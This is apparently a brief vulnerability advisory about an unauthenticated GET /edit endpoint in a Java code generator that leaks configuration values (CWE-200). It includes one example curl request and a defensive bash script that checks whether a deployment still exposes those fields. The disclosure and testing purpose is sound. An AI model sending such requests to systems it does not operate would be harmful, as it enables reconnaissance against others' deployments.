Article 3: Vulnerability 2 – Configuration Exposure (CVE-1 part2)

Title: Sensitive Configuration Information Disclosed Without Authentication

Details:

Endpoint: GET /edit
File: GeneratorController.java
Issue: The endpoint returns configuration values (author name, email, package name, source path, etc.) to unauthenticated callers; no access control is applied.

Example Request:

curl -X GET "http://target-ip:port/edit"

Example Output:

  • author: xxx
  • email: xxx@xxx.com
  • package: com.java2nb.xxx
  • srcPath: /src/main/java

CWE: CWE-200
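
A regression check for the exposure described above, to run against a deployment you operate once access control is added. This is an added example, not code from the affected project: the field names come from the example output, while the function names, the two-field threshold and the status-code handling are assumptions.

```bash
# Added example: regression check for the unauthenticated GET /edit exposure.
# Field names come from the advisory's example output; the two-field threshold
# and the status-code handling are assumptions of this sketch.

FIELDS="author email package srcPath"

# count_fields BODY -> number of distinct configuration field names found in BODY
count_fields() {
  body=$1
  n=0
  for f in $FIELDS; do
    if printf '%s' "$body" | grep -qi -- "$f"; then n=$((n + 1)); fi
  done
  echo "$n"
}

# classify_edit_response STATUS BODY -> EXPOSED | PROTECTED | REVIEW
classify_edit_response() {
  status=$1
  body=$2
  hits=$(count_fields "$body")
  case "$status" in
    401|403|30[1-8])
      # Denied or redirected; the denial body must not carry the fields either.
      if [ "$hits" -ge 2 ]; then echo EXPOSED; else echo PROTECTED; fi ;;
    200)
      if [ "$hits" -ge 2 ]; then echo EXPOSED; else echo REVIEW; fi ;;
    *)
      echo REVIEW ;;
  esac
}

# check_edit_endpoint BASE_URL -> classifies a live request sent with no credentials
check_edit_endpoint() {
  tmp=$(mktemp) || return 2
  status=$(curl -s -o "$tmp" -w '%{http_code}' --max-time 10 "$1/edit")
  classify_edit_response "$status" "$(cat "$tmp")"
  rm -f "$tmp"
}

# Constructed sample bodies (not captured from a real deployment).
SAMPLE_LEAK='author: xxx
email: xxx@xxx.com
package: com.java2nb.xxx
srcPath: /src/main/java'
SAMPLE_LOGIN='<form action="/login"><input name="username"></form>'
classify_edit_response 200 "$SAMPLE_LEAK"
classify_edit_response 302 "$SAMPLE_LOGIN"
```

REVIEW means the response neither denied access nor matched the known fields and needs a manual look.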

posted @ 2025-04-15 20:59  Aibot